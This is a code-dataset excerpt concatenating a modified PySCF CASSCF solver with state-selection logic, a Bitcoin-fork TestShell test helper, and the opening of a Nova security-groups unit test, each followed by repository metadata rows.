log = logger.new_logger(self, verbose)
if eris is None:
fcasci = copy.copy(self)
fcasci.ao2mo = self.get_h2cas
else:
fcasci = _fake_h_for_fast_casci(self, mo_coeff, eris)
e_tot, e_cas, fcivec = casci.kernel(fcasci, mo_coeff, ci0, log)
#if not isinstance(e_cas, (float, numpy.number)):
# raise RuntimeError('Multiple roots are detected in fcisolver. '
# 'CASSCF does not know which state to optimize.\n'
# 'See also mcscf.state_average or mcscf.state_specific for excited states.')
if isinstance(e_tot, (float, numpy.number)):
if envs is not None and log.verbose >= logger.INFO:
log.debug('CAS space CI energy = %.15g', e_cas)
if hasattr(self.fcisolver,'spin_square'):
ss = self.fcisolver.spin_square(fcivec, self.ncas, self.nelecas)
else:
ss = None
if 'imicro' in envs: # Within CASSCF iteration
if ss is None:
log.info('macro iter %d (%d JK %d micro), '
'CASSCF E = %.15g dE = %.8g',
envs['imacro'], envs['njk'], envs['imicro'],
e_tot, e_tot-envs['elast'])
else:
log.info('macro iter %d (%d JK %d micro), '
'CASSCF E = %.15g dE = %.8g S^2 = %.7f',
envs['imacro'], envs['njk'], envs['imicro'],
e_tot, e_tot-envs['elast'], ss[0])
if 'norm_gci' in envs:
log.info(' |grad[o]|=%5.3g '
'|grad[c]|= %s |ddm|=%5.3g',
envs['norm_gorb0'],
envs['norm_gci'], envs['norm_ddm'])
else:
log.info(' |grad[o]|=%5.3g |ddm|=%5.3g',
envs['norm_gorb0'], envs['norm_ddm'])
else: # Initialization step
if ss is None:
log.info('CASCI E = %.15g', e_tot)
else:
log.info('CASCI E = %.15g S^2 = %.7f', e_tot, ss[0])
else:
nroots = len(e_tot)
if envs is not None and log.verbose >= logger.INFO:
#log.debug('CAS space CI energy = %.15g', e_cas)
if 'imicro' in envs: # Within CASSCF iteration
#if self.target_state == 0: # ground state
# #if (numpy.ndim(e_cas) > 0):
# # This is a workaround for external CI solver compatibility.
# e_cas = e_cas[0]
# fcivec = fcivec[0]
# e_tot = e_tot[0]
#Lan: select target state
if(self.is_select_state):
if envs['imacro'] > 0:
log.info('CASCI information')
if(self.is_use_sCI):
civec, config, spin_square_states = read_sCI_output(self.ncas)
for i in range(nroots):
if not self.is_use_sCI:
ss = self.fcisolver.spin_square(fcivec[i], self.ncas, self.nelecas)[0]
else:
ss = extract_spin_state_sCI(i, civec, config)
ss = spin_square_states[i]
log.info('CASCI state %d E = %.15g S^2 = %.7f',
i, e_tot[i], ss)
# target the desired state
print()
log.info('Selecting the CI vector ...')
self.target_state, dipole = select_target_state(self, mo_coeff, fcivec, e_tot, envs, self.target_state, nroots, eris)
log.info('Targeted root %d, dipole: %8.5f, %8.5f, %8.5f', self.target_state, *dipole)
if not self.is_use_sCI:
nat_orbs = self.cas_natorb(mo_coeff, fcivec[self.target_state])
#else:
# target_state = self.target_state
e_tot = e_tot[self.target_state]
e_cas = e_cas[self.target_state]
fcivec = fcivec[self.target_state]
if getattr(self.fcisolver, 'spin_square', None):
ss = self.fcisolver.spin_square(fcivec, self.ncas, self.nelecas)
else:
ss = None
if ss is None:
log.info('macro iter %d (%d JK %d micro), '
'CASSCF E = %.15g dE = %.8g',
envs['imacro'], envs['njk'], envs['imicro'],
e_tot, e_tot-envs['elast'])
else:
log.info('macro iter %d (%d JK %d micro), '
'CASSCF E = %.15g dE = %.8g S^2 = %.7f',
envs['imacro'], envs['njk'], envs['imicro'],
e_tot, e_tot-envs['elast'], ss[0])
if 'norm_gci' in envs:
log.info(' |grad[o]|=%5.3g '
'|grad[c]|= %s |ddm|=%5.3g',
envs['norm_gorb0'],
envs['norm_gci'], envs['norm_ddm'])
else:
log.info(' |grad[o]|=%5.3g |ddm|=%5.3g',
envs['norm_gorb0'], envs['norm_ddm'])
else: # Initialization step
geom_cycle = 0
if os.environ.get("cycle") is not None:
geom_cycle = int(os.environ["cycle"])+1
#print "geomopt cycle = ", geom_cycle
print()
log.info('CASCI information')
#reading sCI information from output.dat
civec = [] #dump variable for sCI
config = [] # dump variable for sCI
if(self.is_use_sCI):
civec, config, spin_square_states = read_sCI_output(self.ncas)
for i in range(nroots):
if not self.is_use_sCI:
ss = self.fcisolver.spin_square(fcivec[i], self.ncas, self.nelecas)[0]
else:
ss = extract_spin_state_sCI(i, civec, config)
ss = spin_square_states[i]
log.info('CASCI state %d E = %.15g S^2 = %.7f',
i, e_tot[i], ss)
print()
for i in range(nroots):
print("Root ", i)
rdm1_AO = addons.make_rdm1(self, mo_coeff, fcivec[i])
#print "rdm1_AO"
#print rdm1_AO
d = scf.hf.dip_moment(mol=self.mol, dm=rdm1_AO)
print()
if not self.is_use_sCI:
nat_orbs = self.cas_natorb(mo_coeff, fcivec[i])
print()
#print "CI vector"
#print fcivec[i]
#exit()
#select target state for new geometry opt cycle
if geom_cycle > 1 and self.is_select_state:
print("Selecting target state for new geometry opt cycle")
nmo = mo_coeff.shape[1]
rdm1_prevgeom_AO = envs['rdm1_pregeom_AO']
rdm1_prevgeom_MO = rota_rdms(mo_coeff, rdm1_prevgeom_AO) #rotate rdm1 to new MOs
d_prevgeom = scf.hf.dip_moment(mol=self.mol, dm=rdm1_prevgeom_AO)
k = 0
self.target_state = 0
for s in range(nroots):
if not self.is_use_sCI:
ss = self.fcisolver.spin_square(fcivec[s], self.ncas, self.nelecas)[0]
else:
ss = extract_spin_state_sCI(s, civec, config)
ss = spin_square_states[s]
casdm1, casdm2 = self.fcisolver.make_rdm12(fcivec[s], self.ncas, self.nelecas)
#casdm1 = self.fcisolver.make_rdm1(fcivec[s], self.ncas, self.nelecas)
#casdm2 = self.fcisolver.make_rdm2(fcivec[s], self.ncas, self.nelecas)
rdm1_MO, rdm2_MO = addons._make_rdm12_on_mo(casdm1, casdm2, self.ncore, self.ncas, nmo)
dNorm = ddmNorm = 1./self.ncas * numpy.linalg.norm(rdm1_MO - rdm1_prevgeom_MO)
if self.is_target_dipole:
rdm1_AO = addons.make_rdm12(self, self.mo_coeff, fcivec[s])
d = scf.hf.dip_moment(mol=self.mol, dm=rdm1_AO)
ddipoleNorm = numpy.linalg.norm(d - d_prevgeom)
dNorm += ddipoleNorm
print("state ", s, "ddmNorm = ", abs(ddmNorm), "dNorm = ", abs(dNorm))
#print rdm1_MO
#print
#ddmNorm_min = 0.
#if s == 0:
ss_target = 0.5*self.target_state_spin*(0.5*self.target_state_spin+1)
if abs(ss - ss_target) < 1e-2:
if k == 0:
dNorm_min = abs(dNorm)
k += 1
else:
if abs(dNorm) < dNorm_min:
self.target_state = s
dNorm_min = abs(dNorm)
print("dNorm ", dNorm, dNorm_min)
else:
print("there is no desirable spin state")
exit()
print()
#self.target_state = 2
log.info('Initial targeted root %d', self.target_state)
print()
e_tot = e_tot[self.target_state]
e_cas = e_cas[self.target_state]
fcivec = fcivec[self.target_state]
#if getattr(self.fcisolver, 'spin_square', None):
# ss = self.fcisolver.spin_square(fcivec, self .ncas, self.nelecas)
#else:
# ss = None
#if ss is None:
# log.info('CASCI E = %.15g', e_tot)
#else:
# log.info('CASCI E = %.15g S^2 = %.7f', e_tot, ss[0])
#
return e_tot, e_cas, fcivec
as_scanner = as_scanner
def uniq_var_indices(self, nmo, ncore, ncas, frozen):
nocc = ncore + ncas
mask = numpy.zeros((nmo,nmo),dtype=bool)
mask[ncore:nocc,:ncore] = True
mask[nocc:,:nocc] = True
if self.internal_rotation:
mask[ncore:nocc,ncore:nocc][numpy.tril_indices(ncas,-1)] = True
if frozen is not None:
if isinstance(frozen, (int, numpy.integer)):
mask[:frozen] = mask[:,:frozen] = False
else:
frozen = numpy.asarray(frozen)
mask[frozen] = mask[:,frozen] = False
return mask
def pack_uniq_var(self, mat):
nmo = self.mo_coeff.shape[1]
idx = self.uniq_var_indices(nmo, self.ncore, self.ncas, self.frozen)
return mat[idx]
# to anti symmetric matrix
def unpack_uniq_var(self, v):
nmo = self.mo_coeff.shape[1]
idx = self.uniq_var_indices(nmo, self.ncore, self.ncas, self.frozen)
mat = numpy.zeros((nmo,nmo))
mat[idx] = v
return mat - mat.T
def update_rotate_matrix(self, dx, u0=1):
dr = self.unpack_uniq_var(dx)
return numpy.dot(u0, expmat(dr))
gen_g_hop = gen_g_hop
rotate_orb_cc = rotate_orb_cc
#genMinRes = genMinRes
rotate_orb_gmres = rotate_orb_gmres
def update_ao2mo(self, mo):
raise DeprecationWarning('update_ao2mo was obseleted since pyscf v1.0. '
'Use .ao2mo method instead')
def ao2mo(self, mo_coeff=None):
if mo_coeff is None: mo_coeff = self.mo_coeff
# nmo = mo.shape[1]
# ncore = self.ncore
# ncas = self.ncas
# nocc = ncore + ncas
# eri = pyscf.ao2mo.incore.full(self._scf._eri, mo)
# eri = pyscf.ao2mo.restore(1, eri, nmo)
# eris = lambda:None
# eris.j_cp = numpy.einsum('iipp->ip', eri[:ncore,:ncore,:,:])
# eris.k_cp = numpy.einsum('ippi->ip', eri[:ncore,:,:,:ncore])
# eris.vhf_c =(numpy.einsum('iipq->pq', eri[:ncore,:ncore,:,:])*2
# -numpy.einsum('ipqi->pq', eri[:ncore,:,:,:ncore]))
# eris.ppaa = numpy.asarray(eri[:,:,ncore:nocc,ncore:nocc], order='C')
# eris.papa = numpy.asarray(eri[:,ncore:nocc,:,ncore:nocc], order='C')
# return eris
return mc_ao2mo._ERIS(self, mo_coeff, method='incore',
level=self.ao2mo_level)
# Don't remove the two functions. They are used in df.approx_hessian code
def get_h2eff(self, mo_coeff=None):
'''Computing active space two-particle Hamiltonian.
Note It is different to get_h2cas when df.approx_hessian is applied,
in which get_h2eff function returns the DF integrals while get_h2cas
returns the regular 2-electron integrals.
'''
return self.get_h2cas(mo_coeff)
def get_h2cas(self, mo_coeff=None):
'''Computing active space two-particle Hamiltonian.
Note It is different to get_h2eff when df.approx_hessian is applied,
in which get_h2eff function returns the DF integrals while get_h2cas
returns the regular 2-electron integrals.
'''
return casci.CASCI.ao2mo(self, mo_coeff)
def update_jk_in_ah(self, mo, r, casdm1, eris):
# J3 = eri_popc * pc + eri_cppo * cp
# K3 = eri_ppco * pc + eri_pcpo * cp
# J4 = eri_pcpa * pa + eri_appc * ap
# K4 = eri_ppac * pa + eri_papc * ap
ncore = self.ncore
ncas = self.ncas
nocc = ncore + ncas
dm3 = reduce(numpy.dot, (mo[:,:ncore], r[:ncore,ncore:], mo[:,ncore:].T))
dm3 = dm3 + dm3.T
dm4 = reduce(numpy.dot, (mo[:,ncore:nocc], casdm1, r[ncore:nocc], mo.T))
dm4 = dm4 + dm4.T
vj, vk = self.get_jk(self.mol, (dm3,dm3*2+dm4))
va = reduce(numpy.dot, (casdm1, mo[:,ncore:nocc].T, vj[0]*2-vk[0], mo))
vc = reduce(numpy.dot, (mo[:,:ncore].T, vj[1]*2-vk[1], mo[:,ncore:]))
return va, vc
# hessian_co exactly expands up to first order of H
# update_casdm exand to approx 2nd order of H
def update_casdm(self, mo, u, fcivec, e_cas, eris, envs={}):
nmo = mo.shape[1]
rmat = u - numpy.eye(nmo)
#g = hessian_co(self, mo, rmat, fcivec, e_cas, eris)
### hessian_co part start ###
ncas = self.ncas
nelecas = self.nelecas
ncore = self.ncore
nocc = ncore + ncas
uc = u[:,:ncore]
ua = u[:,ncore:nocc].copy()
ra = rmat[:,ncore:nocc].copy()
h1e_mo = reduce(numpy.dot, (mo.T, self.get_hcore(), mo))
ddm = numpy.dot(uc, uc.T) * 2
ddm[numpy.diag_indices(ncore)] -= 2
if self.with_dep4:
mo1 = numpy.dot(mo, u)
mo1_cas = mo1[:,ncore:nocc]
dm_core = numpy.dot(mo1[:,:ncore], mo1[:,:ncore].T) * 2
vj, vk = self._scf.get_jk(self.mol, dm_core)
h1 =(reduce(numpy.dot, (ua.T, h1e_mo, ua)) +
reduce(numpy.dot, (mo1_cas.T, vj-vk*.5, mo1_cas)))
eris._paaa = self._exact_paaa(mo, u)
h2 = eris._paaa[ncore:nocc]
vj = vk = None
else:
p1aa = numpy.empty((nmo,ncas,ncas**2))
paa1 = numpy.empty((nmo,ncas**2,ncas))
jk = reduce(numpy.dot, (ua.T, eris.vhf_c, ua))
for i in range(nmo):
jbuf = eris.ppaa[i]
kbuf = eris.papa[i]
jk +=(numpy.einsum('quv,q->uv', jbuf, ddm[i])
- numpy.einsum('uqv,q->uv', kbuf, ddm[i]) * .5)
p1aa[i] = lib.dot(ua.T, jbuf.reshape(nmo,-1))
paa1[i] = lib.dot(kbuf.transpose(0,2,1).reshape(-1,nmo), ra)
h1 = reduce(numpy.dot, (ua.T, h1e_mo, ua)) + jk
aa11 = lib.dot(ua.T, p1aa.reshape(nmo,-1)).reshape((ncas,)*4)
aaaa = eris.ppaa[ncore:nocc,ncore:nocc,:,:]
aa11 = aa11 + aa11.transpose(2,3,0,1) - aaaa
a11a = numpy.dot(ra.T, paa1.reshape(nmo,-1)).reshape((ncas,)*4)
a11a = a11a + a11a.transpose(1,0,2,3)
a11a = a11a + a11a.transpose(0,1,3,2)
h2 = aa11 + a11a
jbuf = kbuf = p1aa = paa1 = aaaa = aa11 = a11a = None
# pure core response
# response of (1/2 dm * vhf * dm) ~ ddm*vhf
# Should I consider core response as a part of CI gradients?
ecore =(numpy.einsum('pq,pq->', h1e_mo, ddm)
+ numpy.einsum('pq,pq->', eris.vhf_c, ddm))
### hessian_co part end ###
ci1, g = self.solve_approx_ci(h1, h2, fcivec, ecore, e_cas, envs)
if g is not None: # So state average CI, DMRG etc will not be applied
ovlp = numpy.dot(fcivec.ravel(), ci1.ravel())
#print "ci ovlp ", ovlp
norm_g = numpy.linalg.norm(g)
if 1-abs(ovlp) > norm_g * self.ci_grad_trust_region:
logger.debug(self, '<ci1|ci0>=%5.3g |g|=%5.3g, ci1 out of trust region',
ovlp, norm_g)
ci1 = fcivec.ravel() + g
ci1 *= 1/numpy.linalg.norm(ci1)
casdm1, casdm2 = self.fcisolver.make_rdm12(ci1, ncas, nelecas)
return casdm1, casdm2, g, ci1
def solve_approx_ci(self, h1, h2, ci0, ecore, e_cas, envs):
''' Solve CI eigenvalue/response problem approximately
'''
ncas = self.ncas
nelecas = self.nelecas
ncore = self.ncore
nocc = ncore + ncas
if 'norm_gorb' in envs:
tol = max(self.conv_tol, envs['norm_gorb']**2*.1)
else:
tol = None
if getattr(self.fcisolver, 'approx_kernel', None):
fn = self.fcisolver.approx_kernel
e, ci1 = fn(h1, h2, ncas, nelecas, ecore=ecore, ci0=ci0,
tol=tol, max_memory=self.max_memory)
return ci1, None
elif not (getattr(self.fcisolver, 'contract_2e', None) and
getattr(self.fcisolver, 'absorb_h1e', None)):
fn = self.fcisolver.kernel
e, ci1 = fn(h1, h2, ncas, nelecas, ecore=ecore, ci0=ci0,
tol=tol, max_memory=self.max_memory,
max_cycle=self.ci_response_space)
return ci1, None
h2eff = self.fcisolver.absorb_h1e(h1, h2, ncas, nelecas, .5)
# Be careful with the symmetry adapted contract_2e function. When the
# symmetry adapted FCI solver is used, the symmetry of ci0 may be
# different to fcisolver.wfnsym. This function may output 0.
if getattr(self.fcisolver, 'guess_wfnsym', None):
wfnsym = self.fcisolver.guess_wfnsym(self.ncas, self.nelecas, ci0)
else:
wfnsym = None
def contract_2e(c):
if wfnsym is None:
hc = self.fcisolver.contract_2e(h2eff, c, ncas, nelecas)
else:
with lib.temporary_env(self.fcisolver, wfnsym=wfnsym):
hc = self.fcisolver.contract_2e(h2eff, c, ncas, nelecas)
return hc.ravel()
hc = contract_2e(ci0)
g = hc - (e_cas-ecore) * ci0.ravel()
if self.ci_response_space > 7:
logger.debug(self, 'CI step by full response')
# full response
max_memory = max(400, self.max_memory-lib.current_memory()[0])
e, ci1 = self.fcisolver.kernel(h1, h2, ncas, nelecas, ecore=ecore,
ci0=ci0, tol=tol, max_memory=max_memory)
else:
nd = min(max(self.ci_response_space, 2), ci0.size)
logger.debug(self, 'CI step by %dD subspace response', nd)
xs = [ci0.ravel()]
ax = [hc]
heff = numpy.empty((nd,nd))
seff = numpy.empty((nd,nd))
heff[0,0] = numpy.dot(xs[0], ax[0])
seff[0,0] = 1
for i in range(1, nd):
xs.append(ax[i-1] - xs[i-1] * e_cas)
ax.append(contract_2e(xs[i]))
for j in range(i+1):
heff[i,j] = heff[j,i] = numpy.dot(xs[i], ax[j])
seff[i,j] = seff[j,i] = numpy.dot(xs[i], xs[j])
e, v = lib.safe_eigh(heff, seff)[:2]
ci1 = xs[0] * v[0,0]
for i in range(1,nd):
ci1 += xs[i] * v[i,0]
return ci1[self.target_state], g
def get_jk(self, mol, dm, hermi=1):
return self._scf.get_jk(mol, dm, hermi=1)
def get_grad(self, mo_coeff=None, casdm1_casdm2=None, eris=None):
'''Orbital gradients'''
if mo_coeff is None: mo_coeff = self.mo_coeff
if eris is None: eris = self.ao2mo(mo_coeff)
if casdm1_casdm2 is None:
e_tot, e_cas, civec = self.casci(mo_coeff, self.ci, eris)
casdm1, casdm2 = self.fcisolver.make_rdm12(civec, self.ncas, self.nelecas)
else:
casdm1, casdm2 = casdm1_casdm2
return self.gen_g_hop(mo_coeff, 1, casdm1, casdm2, eris)[0]
def _exact_paaa(self, mo, u, out=None):
nmo = mo.shape[1]
ncore = self.ncore
ncas = self.ncas
nocc = ncore + ncas
mo1 = numpy.dot(mo, u)
mo1_cas = mo1[:,ncore:nocc]
mos = (mo1_cas, mo1_cas, mo1, mo1_cas)
if self._scf._eri is None:
aapa = ao2mo.general(self.mol, mos)
else:
aapa = ao2mo.general(self._scf._eri, mos)
paaa = numpy.empty((nmo*ncas,ncas*ncas))
buf = numpy.empty((ncas,ncas,nmo*ncas))
for ij, (i, j) in enumerate(zip(*numpy.tril_indices(ncas))):
buf[i,j] = buf[j,i] = aapa[ij]
paaa = lib.transpose(buf.reshape(ncas*ncas,-1), out=out)
return paaa.reshape(nmo,ncas,ncas,ncas)
def dump_chk(self, envs):
if not self.chkfile:
return self
if getattr(self.fcisolver, 'nevpt_intermediate', None):
civec = None
elif self.chk_ci:
civec = envs['fcivec']
else:
civec = None
ncore = self.ncore
nocc = self.ncore + self.ncas
if 'mo' in envs:
mo_coeff = envs['mo']
else:
mo_coeff = envs['mo_coeff']
mo_occ = numpy.zeros(mo_coeff.shape[1])
mo_occ[:ncore] = 2
if self.natorb:
occ = self._eig(-envs['casdm1'], ncore, nocc)[0]
mo_occ[ncore:nocc] = -occ
else:
mo_occ[ncore:nocc] = envs['casdm1'].diagonal()
# Note: mo_energy in active space =/= F_{ii} (F is general Fock)
if 'mo_energy' in envs:
mo_energy = envs['mo_energy']
else:
mo_energy = 'None'
chkfile.dump_mcscf(self, self.chkfile, 'mcscf', envs['e_tot'],
mo_coeff, self.ncore, self.ncas, mo_occ,
mo_energy, envs['e_cas'], civec, envs['casdm1'],
overwrite_mol=False)
return self
def update_from_chk(self, chkfile=None):
if chkfile is None: chkfile = self.chkfile
self.__dict__.update(lib.chkfile.load(chkfile, 'mcscf'))
return self
update = update_from_chk
def rotate_mo(self, mo, u, log=None):
'''Rotate orbitals with the given unitary matrix'''
mo = numpy.dot(mo, u)
if log is not None and log.verbose >= logger.DEBUG:
ncore = self.ncore
ncas = self.ncas
nocc = ncore + ncas
s = reduce(numpy.dot, (mo[:,ncore:nocc].T, self._scf.get_ovlp(),
self.mo_coeff[:,ncore:nocc]))
log.debug('Active space overlap to initial guess, SVD = %s',
numpy.linalg.svd(s)[1])
log.debug('Active space overlap to last step, SVD = %s',
numpy.linalg.svd(u[ncore:nocc,ncore:nocc])[1])
return mo
def micro_cycle_scheduler(self, envs):
if not WITH_MICRO_SCHEDULER:
return self.max_cycle_micro
log_norm_ddm = numpy.log(envs['norm_ddm'])
return max(self.max_cycle_micro, int(self.max_cycle_micro-1-log_norm_ddm))
def max_stepsize_scheduler(self, envs):
if not WITH_STEPSIZE_SCHEDULER:
return self.max_stepsize
if self._max_stepsize is None:
self._max_stepsize = self.max_stepsize
if envs['de'] > -self.conv_tol: # Avoid total energy increasing
self._max_stepsize *= .3
logger.debug(self, 'set max_stepsize to %g', self._max_stepsize)
else:
self._max_stepsize = (self.max_stepsize*self._max_stepsize)**.5
return self._max_stepsize
def ah_scheduler(self, envs):
pass
@property
def max_orb_stepsize(self): # pragma: no cover
return self.max_stepsize
@max_orb_stepsize.setter
def max_orb_stepsize(self, x): # pragma: no cover
sys.stderr.write('WARN: Attribute "max_orb_stepsize" was replaced by "max_stepsize"\n')
self.max_stepsize = x
@property
def ci_update_dep(self): # pragma: no cover
return self.with_dep4
@ci_update_dep.setter
def ci_update_dep(self, x): # pragma: no cover
sys.stderr.write('WARN: Attribute .ci_update_dep was replaced by .with_dep4 since PySCF v1.1.\n')
self.with_dep4 = x == 4
grad_update_dep = ci_update_dep
@property
def max_cycle(self):
return self.max_cycle_macro
@max_cycle.setter
def max_cycle(self, x):
self.max_cycle_macro = x
def approx_hessian(self, auxbasis=None, with_df=None):
from pyscf.mcscf import df
return df.approx_hessian(self, auxbasis, with_df)
def nuc_grad_method(self):
from pyscf.grad import casscf
return casscf.Gradients(self)
def newton(self):
from pyscf.mcscf import newton_casscf
mc1 = newton_casscf.CASSCF(self._scf, self.ncas, self.nelecas)
mc1.__dict__.update(self.__dict__)
mc1.max_cycle_micro = 10
return mc1
# to avoid calculating AO integrals
def _fake_h_for_fast_casci(casscf, mo, eris):
mc = copy.copy(casscf)
mc.mo_coeff = mo
ncore = casscf.ncore
nocc = ncore + casscf.ncas
mo_core = mo[:,:ncore]
mo_cas = mo[:,ncore:nocc]
core_dm = numpy.dot(mo_core, mo_core.T) * 2
hcore = casscf.get_hcore()
energy_core = casscf.energy_nuc()
energy_core += numpy.einsum('ij,ji', core_dm, hcore)
energy_core += eris.vhf_c[:ncore,:ncore].trace()
h1eff = reduce(numpy.dot, (mo_cas.T, hcore, mo_cas))
h1eff += eris.vhf_c[ncore:nocc,ncore:nocc]
mc.get_h1eff = lambda *args: (h1eff, energy_core)
ncore = casscf.ncore
nocc = ncore + casscf.ncas
eri_cas = eris.ppaa[ncore:nocc,ncore:nocc,:,:].copy()
mc.get_h2eff = lambda *args: eri_cas
return mc
def expmat(a):
return scipy.linalg.expm(a)
if __name__ == '__main__':
from pyscf import scf
from pyscf import fci
from pyscf.mcscf import addons
mol = gto.Mole()
mol.verbose = 0
mol.output = None#"out_h2o"
mol.atom = [
['H', ( 1.,-1. , 0. )],
['H', ( 0.,-1. ,-1. )],
['H', ( 1.,-0.5 ,-1. )],
['H', ( 0.,-0.5 ,-1. )],
['H', ( 0.,-0.5 ,-0. )],
['H', ( 0.,-0. ,-1. )],
['H', ( 1.,-0.5 , 0. )],
['H', ( 0., 1. , 1. )],
]
mol.basis = {'H': 'sto-3g',
'O': '6-31g',}
mol.build()
m = scf.RHF(mol)
ehf = m.scf()
emc = kernel(CASSCF(m, 4, 4), m.mo_coeff, verbose=4)[1]
print(ehf, emc, emc-ehf)
print(emc - -3.22013929407)
mc = CASSCF(m, 4, (3,1))
mc.verbose = 4
#mc.fcisolver = fci.direct_spin1
mc.fcisolver = fci.solver(mol, False)
emc = kernel(mc, m.mo_coeff, verbose=4)[1]
print(emc - -15.950852049859-mol.energy_nuc())
mol.atom = [
['H', ( 5.,-1. , 1. )],
['H', ( 0.,-5. ,-2. )],
['H', ( 4.,-0.5 ,-3. )],
['H', ( 0.,-4.5 ,-1. )],
['H', ( 3.,-0.5 ,-0. )],
['H', ( 0.,-3. ,-1. )],
['H', ( 2.,-2.5 , 0. )],
['H', ( 1., 1. , 3. )],
]
mol.basis = {'H': 'sto-3g',
'O': '6-31g',}
mol.build()
m = scf.RHF(mol)
ehf = m.scf()
emc = kernel(CASSCF(m, 4, 4), m.mo_coeff, verbose=4)[1]
print(ehf, emc, emc-ehf)
print(emc - -3.62638367550087, emc - -3.6268060528596635)
mc = CASSCF(m, 4, (3,1))
mc.verbose = 4
mc.natorb = 1
#mc.fcisolver = fci.direct_spin1
mc.fcisolver = fci.solver(mol, False)
emc = kernel(mc, m.mo_coeff, verbose=4)[1]
print(emc - -3.62638367550087)
mol.atom = [
['O', ( 0., 0. , 0. )],
['H', ( 0., -0.757, 0.587)],
['H', ( 0., 0.757 , 0.587)],]
mol.basis = {'H': 'cc-pvdz',
'O': 'cc-pvdz',}
mol.build()
m = scf.RHF(mol)
ehf = m.scf()
mc = CASSCF(m, 6, 4)
mc.fcisolver = fci.solver(mol)
mc.verbose = 4
mo = addons.sort_mo(mc, m.mo_coeff, (3,4,6,7,8,9), 1)
emc = mc.mc1step(mo)[0]
print(ehf, emc, emc-ehf)
#-76.0267656731 -76.0873922924 -0.0606266193028
print(emc - -76.0873923174, emc - -76.0926176464)
mc = CASSCF(m, 6, (3,1))
mo = addons.sort_mo(mc, m.mo_coeff, (3,4,6,7,8,9), 1)
#mc.fcisolver = fci.direct_spin1
mc.fcisolver = fci.solver(mol, False)
mc.verbose = 4
emc = mc.mc1step(mo)[0]
#mc.analyze()
print(emc - -75.7155632535814)
mc.internal_rotation = True
emc = mc.mc1step(mo)[0]
print(emc - -75.7155632535814)
| 41.619124 | 145 | 0.557689 |
ef5bc00488cfefa6e3f9bd272767e206fec3d597 | 2,412 | py | Python | test/functional/test_framework/test_shell.py | Cminor-pools/bitcoinvg | d47a3cf13e06f4fe03d965826f5309e6d5706470 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_shell.py | Cminor-pools/bitcoinvg | d47a3cf13e06f4fe03d965826f5309e6d5706470 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_shell.py | Cminor-pools/bitcoinvg | d47a3cf13e06f4fe03d965826f5309e6d5706470 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinVGTestFramework
class TestShell:
"""Wrapper Class for BitcoinVGTestFramework.
The TestShell class extends the BitcoinVGTestFramework
rpc & daemon process management functionality to external
python environments.
It is a singleton class, which ensures that users only
start a single TestShell at a time."""
class __TestShell(BitcoinVGTestFramework):
def set_test_params(self):
pass
def run_test(self):
pass
def setup(self, **kwargs):
if self.running:
print("TestShell is already running!")
return
# Num_nodes parameter must be set
# by BitcoinVGTestFramework child class.
self.num_nodes = 1
# User parameters override default values.
for key, value in kwargs.items():
if hasattr(self, key):
setattr(self, key, value)
elif hasattr(self.options, key):
setattr(self.options, key, value)
else:
raise KeyError(key + " not a valid parameter key!")
super().setup()
self.running = True
return self
def shutdown(self):
if not self.running:
print("TestShell is not running!")
else:
super().shutdown()
self.running = False
def reset(self):
if self.running:
print("Shutdown TestShell before resetting!")
else:
self.num_nodes = None
super().__init__()
instance = None
def __new__(cls):
# This implementation enforces singleton pattern, and will return the
# previously initialized instance if available
if not TestShell.instance:
TestShell.instance = TestShell.__TestShell()
TestShell.instance.running = False
return TestShell.instance
def __getattr__(self, name):
return getattr(self.instance, name)
def __setattr__(self, name, value):
return setattr(self.instance, name, value)
| 31.736842 | 77 | 0.597015 |
9669a3eb8a2abf40392b30f9a3d85c32caa02b32 | 67,511 | py | Python | nova/tests/unit/api/openstack/compute/contrib/test_security_groups.py | belmiromoreira/nova | d03ef34b0b1ed96a2f2bea1f5f01f09436c55125 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/contrib/test_security_groups.py | belmiromoreira/nova | d03ef34b0b1ed96a2f2bea1f5f01f09436c55125 | [
"Apache-2.0"
] | 1 | 2019-01-02T01:30:35.000Z | 2019-01-02T01:38:02.000Z | nova/tests/unit/api/openstack/compute/contrib/test_security_groups.py | jeffrey4l/nova | 35375133398d862a61334783c1e7a90b95f34cdb | [
"Apache-2.0"
] | null | null | null | # Copyright 2011 OpenStack Foundation
# Copyright 2012 Justin Santa Barbara
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from mox3 import mox
from oslo_config import cfg
from oslo_serialization import jsonutils
import webob
from nova.api.openstack.compute.contrib import security_groups as secgroups_v2
from nova.api.openstack.compute.plugins.v3 import security_groups as \
secgroups_v21
from nova import compute
from nova.compute import power_state
from nova import context as context_maker
import nova.db
from nova import exception
from nova import objects
from nova.objects import instance as instance_obj
from nova import quota
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
CONF = cfg.CONF
FAKE_UUID1 = 'a47ae74e-ab08-447f-8eee-ffd43fc46c16'
FAKE_UUID2 = 'c6e6430a-6563-4efa-9542-5e93c9e97d18'
class AttrDict(dict):
def __getattr__(self, k):
return self[k]
def security_group_template(**kwargs):
sg = kwargs.copy()
sg.setdefault('tenant_id', '123')
sg.setdefault('name', 'test')
sg.setdefault('description', 'test-description')
return sg
def security_group_db(security_group, id=None):
attrs = security_group.copy()
if 'tenant_id' in attrs:
attrs['project_id'] = attrs.pop('tenant_id')
if id is not None:
attrs['id'] = id
attrs.setdefault('rules', [])
attrs.setdefault('instances', [])
return AttrDict(attrs)
def security_group_rule_template(**kwargs):
rule = kwargs.copy()
rule.setdefault('ip_protocol', 'tcp')
rule.setdefault('from_port', 22)
rule.setdefault('to_port', 22)
rule.setdefault('parent_group_id', 2)
return rule
def security_group_rule_db(rule, id=None):
attrs = rule.copy()
if 'ip_protocol' in attrs:
attrs['protocol'] = attrs.pop('ip_protocol')
return AttrDict(attrs)
def return_server(context, server_id,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': int(server_id),
'power_state': 0x01,
'host': "localhost",
